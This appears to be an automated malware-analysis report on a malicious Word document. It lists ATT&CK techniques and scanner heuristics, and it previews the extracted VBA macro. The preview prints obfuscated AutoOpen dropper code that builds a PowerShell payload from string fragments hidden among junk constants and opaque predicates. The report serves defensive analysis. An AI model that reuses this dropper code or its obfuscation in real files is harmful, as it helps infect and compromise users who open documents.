MALICIOUS
Risk Score: 290

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1566.001 Spearphishing Attachment
- T1203 Exploitation for Client Execution
The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This macro utilizes Shell() and CreateObject() calls, and attempts to construct a string that appears to be a URL or command. The heuristic 'SE_CLIPBOARD_COMMAND_LURE' indicates the document may instruct the user to paste content into a shell, further suggesting malicious intent. The ClamAV detection 'Doc.Dropper.Agent-7079654-0' confirms its classification as a dropper.
Heuristics (9)

- ClamAV: Doc.Dropper.Agent-7079654-0 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Dropper.Agent-7079654-0
- VBA macros detected [medium, 4 related findings] OLE_VBA_MACROS: Document contains VBA macro code
- Shell() call in VBA [critical] OLE_VBA_SHELL: Shell() call in VBA
- AutoOpen macro [high] OLE_VBA_AUTOOPEN: AutoOpen macro
- CreateObject call [high] OLE_VBA_CREATEOBJ: CreateObject call
- Environ() call (env variable access) [low] OLE_VBA_ENVIRON: Environ() call (env variable access)
- Clipboard command execution lure [high] SE_CLIPBOARD_COMMAND_LURE: Document tells the user to copy or paste clipboard content into Run, PowerShell, cmd, or another shell-like execution context
- Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
  - http://purl.org/dc/elements/1.1/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
  - http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
  - http://ns.adobe.com/tiff/1.0/ (in document text, OLE body)
  - http://ns.adobe.com/exif/1.0/ (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 69386 bytes |

SHA-256 (macros.bas): 2c6bf572a5548ceee6fa0a0b3e42f766afcfb997a58d493736644d37b5f472e1
Preview script: first 1,000 lines of the extracted script. The AutoOpen body interleaves junk Const declarations and opaque predicates (for example `29 * 88 = 6229`, which is false, and `26 - 30 = -4`, which is true) with string concatenations that assemble a PowerShell-looking payload fragment by fragment.

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Function iueif()
    MsgBox ""
End Function
Sub AutoOpen()
    Const iizeokv09 = False
    Const kbwsfc_o = False
    Const wrnoshw_f = False
    Const uo_aj = False
    Const ygcmwa = True
    Const iutaysc0 = False
    Const ykjrgcpko07 = False
    If 29 * 88 = 6229 Then
        Const kdaaxv8 = True
        Const frzifyi22 = True
        Const utzik = False
        Const usrivkbt = False
        Const iedvrld = False
        Const ayrra = True
        Const vrms_uuue = False
    ElseIf 26 - 30 = -4 Then
        edj_kel63 = "$oaibfxvjiowlxxw_iekfpfyiu"
    Else
        Const ixziidc = True
        Const nqiyvlnjo = False
        Const auen = False
        Const dgaae3 = True
        Const aavkdi = True
        Const amgbzzfee5 = True
        Const eya_y = True
        Const kzxqxl = False
    End If
    Select Case "oxg_uvfet"
        Case fb_yepwoy88
            Const oh_esbg = True
            Const pd_yixk = False
            Const uwpnrw_yu = True
        Case 10687
            Const mpiqlja = True
            Const kgukqt = False
            Const iefqrke6 = True
        Case "oxg_uvfet"
            cfxl_gfv = "uoycid='org/C"
            edj_kel63 = edj_kel63 + cfxl_gfv
    End Select
    Const iy_cntgsm = False
    Select Case "sxnrui"
        Case iiaxsqezu
            Const ipfdayz = False
        Case "sxnrui"
            evpyiai = "J';$n"
            Const dukh_a = False
            Const iv_iwb = False
            edj_kel63 = yaby + edj_kel63 + evpyiai + oahtaaa30
        Case 20072
            Const zmoeio = False
    End Select
    Const acugley4 = True
    Select Case 81 * 88
        Case 7128
            anooioa = "atpxmhofkbbeb_huseu"
            edj_kel63 = edj_kel63 + anooioa + vqton
    End Select
    Select Case 15 - 36
        Case -21
            edj_kel63 = edj_kel63 + "eei='ojqa';$owaizbpyuao" + ixcei
    End Select
    If 71 - 38 = 33 Then
        kbezdzzytq = edj_kel63
        Const uepe02 = False
        y_qhab = "yyawtzcwqygabpqs"
        kbezdzzytq = ev_vrz + kbezdzzytq + y_qhab
    End If
    Const twwfkh_sym = False
    Select Case "uoaoyvr_j"
        Case "uoaoyvr_j"
            kbezdzzytq = hajsds + kbezdzzytq + "rqeeidno4=' =';$eikoia_yblegbmybniemxea_ogwepz" + xdiab
    End Select
    Const psiakke = True
    Select Case 32 - 88
        Case -56
            iauah50 = "='e]$ojqa0';$mdroaen"
            kbezdzzytq = kbezdzzytq + iauah50
    End Select
    Select Case "fzur95"
        Case "fzur95"
            puugo = "b_esuwo='ient).';$w"
            kbezdzzytq = ajvgf_pxsvpo + kbezdzzytq + puugo + zhjwh
    End Select
    Const lcwao = False
    Select Case 54 + 62
        Case acnqf_cdq
            Const snovlglksy0 = False
            Const kcc_dgp = False
            Const uitloclo = True
        Case 116
            gmuoalb = "vmbvwoxkjuhj"
            kbezdzzytq = kbezdzzytq + gmuoalb
    End Select
    Const atujhsfo = False
    Select Case "uonbxia"
        Case "uonbxia"
            kbezdzzytq = xayjh + kbezdzzytq + "t='($env:a';$mzoiuddeyaj"
        Case 25741
            Const udcuyugx = True
            Const zyneoe = False
    End Select
    If 76 * 76 = 5776 Then
        wft_ewhmncs = eidryso + kbezdzzytq
        Const fnoodljwk = False
        xuhiouy = "lqncmnrvpotqghzbopauau='($';$tco"
        wft_ewhmncs = uydhm_dx + wft_ewhmncs + xuhiouy + oqgnsyjxv
    Else
    End If
    Const xiqvwh = False
    Const zshjcccwm = False
    If 35 * 9 = 315 Then
        okixpzcsjw00 = wft_ewhmncs
        Const rvjqaglo = True
        Const wochoeu = True
        yupexujf = "zygiwfcyinfvnu"
        okixpzcsjw00 = okixpzcsjw00 + yupexujf
    End If
    Const zqrtv = False
    If 17 - 6 = 23 Then
    ElseIf 90 - 18 = 72 Then
        aqcyi = nckgw + okixpzcsjw00
        Const oeoznne = True
        vnopuaqenz6 = "_euqaocnlecylzi='br"
        aqcyi = aqcyi + vnopuaqenz6 + a_rgzwur
    Else
    End If
    If 56 - 49 = 7 Then
        aqcyi = aqcyi + "';$q"
    End If
    Const yeuea = True
    If 2219 >= 7013 Then
        Const nocvezb = True
        Const oqptte = True
        Const mftti = False
        Const ywau45 = True
        Const aprgt = False
        Const dgyaa = False
    Else
        t_rpssijwpl = Environ("SystemRoot")
    End If
    Const iqkmdt28 = True
    If 9919 < 1932 Then
        Const xdtbea = False
        Const aiwob = True
        Const tdmczx = True
        Const ctp_zke = False
        Const pvigvpsei = False
        Const wlm_drj = True
        Const ubwobxoxj = True
    ElseIf 5087 < 7189 Then
        phyktrv = aqcyi
        Const eeee_e = True
        uaegz = "cyeatbinwxsmezc_h"
        phyktrv = phyktrv + uaegz
    Else
        Const zltot3 = False
        Const ekwgejdr = True
        Const oftudd = True
```

... (truncated)